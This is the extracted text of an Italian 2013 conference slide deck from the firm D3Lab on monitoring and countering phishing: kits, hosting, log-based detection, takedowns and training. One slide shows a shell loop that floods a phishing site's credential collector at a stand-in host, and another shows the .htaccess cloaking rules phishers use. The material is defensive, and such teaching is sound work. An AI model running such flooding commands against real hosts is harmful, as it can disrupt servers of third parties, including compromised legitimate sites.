é possibile m

1. Phishing:
monitoraggio e contrasto.
I possibili approcci e le reali possibilitA'
Torino 30 maggio 2013
Denis Frati

2. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 1
Frode utenti Telepass
21-6-2012: 50 cc validi luhn
Frode utenti Poste Pay
14-11-2012: 17 cc validi luhn
Frode utenti PayPal 15-11-2012:
5 cc validi luhn
Frode Agip/Eni 19-11-2012: 17
cc validi luhn
Frode utenti Visa 20-11-2012:
23 cc validi luhn
ecc... ecc... ecc...
Il phishing non e' la truffa degli sciocchi!!
Denis Frati – D3Lab
Www.d3lab.net

3. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 1
(social network)
Denis Frati – D3Lab
Www.d3lab.net

4. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 2
(e-mail account)
Denis Frati – D3Lab
Www.d3lab.net

5. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 2
Il phishing non e' solo bancario – 2
(On-line game)
Denis Frati – D3Lab
Www.d3lab.net

6. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Se ne frega dell'otp
Denis Frati – D3Lab
Www.d3lab.net

7. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Perche' gli bastano le carte di credito - 1
Denis Frati – D3Lab
Www.d3lab.net

8. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… Perche' gli bastano le
carte di credito - 2
Denis Frati – D3Lab
Www.d3lab.net

9. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
sfatiamo i luoghi comuni - 3
… o l'accesso agli account in cui reperirle
Denis Frati – D3Lab
Www.d3lab.net

10. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Generalita'
Il Phishing è:
●
●
●
●
di semplice attuazione;
poco dispendioso;
trans-frontaliero;
a basso rischio;
si avvantaggia di:
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
ampio bacino vittime;
innumerevoli target;
pericolosità sottostimata;

11. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 1
- Il kit Kit di phishing:
l'insieme di pagine html/htm,
php ed immagini, riproducenti
quelle dell'ente target.
<--- li fanno e
li vendono
Denis Frati – D3Lab
Www.d3lab.net

12. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 2
- liste di indirizzi mail & mail server Liste di indirizzi email a cui
inviare le mail fraudolente.
Sistema invio mail:
●
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
mail sender php;
server di posta violati;
macchine compromesse;
connessioni wireless
aperta;

13. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Di cosa necessita' il phisher ? - 3
- SPAZIO di hosting Spazio di hosting:
●
●
●
●
Denis Frati – D3Lab
Www.d3lab.net
gratuito;
a pagamento;
sito violato;
sulla propria macchina +
dns dinamico;

14. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
FUNZIOnamento base
3
2
1
6
4
5
6
Denis Frati – D3Lab
Www.d3lab.net

15. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Previsioni, preveggenza, vaticinio ???
Denis Frati – D3Lab
Www.d3lab.net

16. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
monitoraggio
Undergorund & cyber crime intelligence
False pagine web on-line
Attack spread
Provenienza
Profili utente
Denis Frati – D3Lab
Www.d3lab.net

17. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Undergorund & cyber crime intelligence
Tra il dire ed il fare …
sono necessari:
●
●
●
●
●
●
●
struttura;
risorse umane;
tempo
conoscenza degli “ambienti”
storico: profili, attività, partecipazioni, conoscenze
referenze;
ecc;
… non basta iscriversi ad un forum/blog underground,
frequentare saltuariamente un canale irc su un server .ru
Denis Frati – D3Lab
Www.d3lab.net

18. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Presenza false pagine web on-line
●
●
●
●
il phishing è dinamico, veloce!
raramente sono presenti collegamenti a
pagine web indicizzate;
l'indicizzazione è spesso successiva alle prime
segnalazioni di frode;
il phisher conosce benissimo e usa:
➔
➔
robot.txt;
htaccess;
User-agent: *
Disallow: /folder1/
User-Agent: Googlebot
Disallow: /folder2/
RewriteEngine On
...
RewriteCond %{HTTP_USER_AGENT} ^Wget [OR]
RewriteCond %{HTTP_USER_AGENT} ^Googlebot
RewriteRule ^.* - [F,L]
Denis Frati – D3Lab
Www.d3lab.net

19. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
ATTACK spread
●
falsificazione degli header della mail
Notifica mancati recapiti ->WARNING
un diluvio di notifiche che può anche mettere
in crisi il web server
Return-Path: <info@mycompany.it>
●
invio massiccio di mail anche a indirizzi
inesistenti
sono necessari:
●
monitoraggio data-base on line;
●
mail box civetta;
●
segnalatori (spesso i clienti verso filiali);
… buongiorno ho visto la mail per il concorso,
quello del bonus per la ricarica
addestrare il personale
a ricevere le segnalazioni
… scusi mi avete scritto per un mio conto ...ma
io non sono vostro cliente ….
Denis Frati – D3Lab
Www.d3lab.net
Scusi?? mi spieghi bene, …
…mi inoltri la mail,
…può inviarmi il sorgente della
mail?

20. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio
Monitorare la provenienza - 1
188.216.109.13 - - [25/May/2013:17:30:46 -0700] "GET /area_personale/login.php HTTP/1.1" 200 6820
"http://mycompany.victimsite.com.vn/area_personale/login.php" "Mozilla/6.0 (compatible; MSIE 7.03;
Windows ME) Opera 5.11 [en]"
Source Ip address: 188.216.109.13
Data: [25/May/2013:17:30:46 -0700]
Risorsa richiesta: "GET /area_personale/login.php HTTP/1.1"
Risposta server: 200 6820
Referer: "http://mycompany.victimsite.com.vn/area_personale/login.php"
User Agent: "Mozilla/6.0 (compatible; MSIE 7.03; Windows ME) Opera 5.11 [en]"
from http://httpd.apache.org/docs/2.2/logs.html
la vittima viene rimandata a specifiche pagine legittime;
noti i referer legittimi evidenzio richieste con referer non trusted (no IT, no
*.mycompany.com, ecc..)
Denis Frati – D3Lab
Www.d3lab.net

21. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Dal Monitoraggio al contrasto
Attraverso Monitoraggio provenienza
referer pericoloso
su pagina login
azioni di verifica diretta
identifico
cliente
confronto profilo cliente
ulteriori verifiche
rilevo IP possibile
vittima
Frode ?
Y
fatto login ?
N
Y
blocco account
blocco operatività
1- test security company, curiosi, casuale, ecc
2- cliente che non prosegue con login
Denis Frati – D3Lab
Www.d3lab.net
N
Evento >> log.db

22. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Richieste shutdown
Eliminare le pagine web fraudolente è imperativo, ma …
… realisticamente i mezzi sono pochi!
Si inoltrano le richieste a:
● gestori siti web;
● gestori server;
● hoster;
● fornitori connettività;
Tuttavia permangono problemi dovuti a:
● orari, fusi orari e festività;
● difficoltà contatto;
● servizi whois privacy;
● incomprensioni linguistiche;
● diffidenza;
Denis Frati – D3Lab
Www.d3lab.net

23. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contrasto - Richieste shutdown – PLAYNG WITH
redirect
Denis Frati – D3Lab
Www.d3lab.net

24. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contrasto - Richieste shutdown
PLAYNG WITH DYNAMIC DNS & fake sub domain
I servizi di DNS dinamico permettono al
criminale di:
● creare domini con nomi ingannevoli;
● mantenere le strutture/pagine web al
sicuro su proprie macchine connesse
in rete via SIM card
● celare la reale posizione delle pagine
- É necessario tracciare gli indirizzi IP
correlati ai domini
- intervenire
•
con corretti titolari degli IP
•
Fornitori servizio Dyn DNS
Il criminale:
● aggredisce il sito A;
● accede al pannello digestione
domini/DNS
● imposta subdomini con wild card;
● aggredisce il sito B
● inocula le pagine fraudolente
● dirotta su di esse i subdomini di A
www.post4.it.sitobucato.com
È necessario intervenire con tutte le
parti:
● gestori dei siti A & B
● hoster dei siti A & B
● fornitori connettività A & B;
Denis Frati – D3Lab
Www.d3lab.net

25. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Credentials bombing
Le credenziali rubate vengono:
● spedite via mail al criminale;
● scritte su file di testo (locali o remoti);
● scritte in db remoti;
Ehi Cattivo?!?! Vuoi le credenziali ???
Eccole!!
A=1
while [ $A -eq 1 ]
do
wget/curl http://attacksite.com/login.php?user&pass&pin
done
Denis Frati – D3Lab
Www.d3lab.net

26. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
Credentials search
Se le credenziali sono scritte su file possono
essere individuate !!
Però lo sanno anche loro e
le scrivono in /tmp che
leggono via shell remote
Denis Frati – D3Lab
Www.d3lab.net

27. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
kit search
L'individuazione del kit mi consente di
● Sapere dove (presumibilmente) finiscono
le credenziali;
● Profilare il possibile utilizzatore o autore
del kit;
● Conoscere la propria pagina da
monitorare nei log http per i referer non
trusted;
● Conoscere le proprie risorse (immagini,
applet flash, css, ecc...) usate dei
criminali per bloccarle;
Denis Frati – D3Lab
Www.d3lab.net

28. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 1
Hai trovato una shell remota!!!
Grida di giubilio!!
Puoi entrare e sderenarli!!
Denis Frati – D3Lab
Www.d3lab.net

29. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 2
Ricorda:
vuoi utilizzare exploit e shell remote come il phisher per contrastarlo?
Commetti almeno un reato
Art. 615 ter. C.p.(accesso abusivo a sistem informatico)
se non due
Art. 617 quinquies. C.p. (danneggiamento sistema informatico).
E le responsabilità aziendali ?!?!
Inoltre: le info eventualmente raccolte non sono “forensicaly sound” perché
acquisiste in modo illecito!
Denis Frati – D3Lab
Www.d3lab.net

30. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
I WANT TO BE BAD! - 3
Ricorda:
puoi accedere (illecitamente) allo spazio usato dal criminale,
cancellare i suoi file, le pagine web fraudolente, ma …
… se la vulnerabilità che ha permesso l'accesso al criminale permane..
NON HAI RISOLTO MOLTO.
È probabile un successivo riutilizzo a fini fraudolenti del sito /server perché la
porta è ancora aperta!
Denis Frati – D3Lab
Www.d3lab.net

31. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Monitoraggio & Analisi a tutto campo
Basi del contrasto
Un monitoraggio ampio e continuo
permette:
● Rilevare cambi di modalità operativa;
● Individuare nuove piattaforme bersaglio
per inoculazione;
● Conoscere nomi dei file di credenziali e
delle shell remote;
● Individuare i kit;
● Riconoscere la “firma” degli autori e
profilarli;
● Individuare nell'analisi attacchi a non
clienti tracce di attacco a clienti;
● Ipotizzare possibili futuri enti bersaglio.
Denis Frati – D3Lab
Www.d3lab.net

32. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Previsioni, preveggenza, vaticinio ???
Il monitoraggio a largo raggio fornisce indicazioni
sugli orientamenti dei phisher:
es. agosto 2012 rilavati attacchi a EDF (fornitore
energia francese)
Fine 2012 attacchi a Gruppo, Agip/Eni
es. agosto 2012 attacchi BNP-PARIBAS (DE)
Autunno 2012 attacchi BNP-PARIBAS (IT)
Maggio 2013 attacchi BNP-PARIBAS (ES)
es:fine 2012 attacchi Deteuche Bank IT
1° quadr. 2013 attacchi Deteuche Bank (DE)
Phishing forecast: chi verrà attaccato nei prossimi giorni?
www.denisfrati.it/s?forecast :O ← analisi log http siti dei phisher
Denis Frati – D3Lab
Www.d3lab.net

33. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
contrasto
formazione
La (in)formazione del cliente può
avere un buon ritorno di immagine, a
costi contenuti.
Gli avvisi sulle pagine web non li
legge nessuno,ancor meno i deplian.
La formazione degli utenti interni, dei
dipendenti, porta solo sicurezza.
Kevin Mitnick parlava di formazione
aziendale a contrasto dall'ingegneria
sociale già nel 2002 (l'arte
dell'inganno).
Denis Frati – D3Lab
Www.d3lab.net

34. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
domande
Denis Frati – D3Lab
Www.d3lab.net

35. Phishing: monitoraggio e contrasto. I possibili approcci e le reali possibilitA' - Torino 30 maggio 2013
Contatti:
d3lab ~ $ whois denisfrati
Registrant Info:
Registrant: denis frati
Mail address: info@d3lab.net
Company: D3Lab
Address: Ivrea (TO) – V. Jervis, 4
Phone: +39-0125-1963370
Fax: +39-0125-1963371
Compeny web site: www.d3lab.net
Personal web site: www.denisfrati.it
Expires on..............: never
Last modified on........: 2012-02-20
Denis Frati – D3Lab
Www.d3lab.net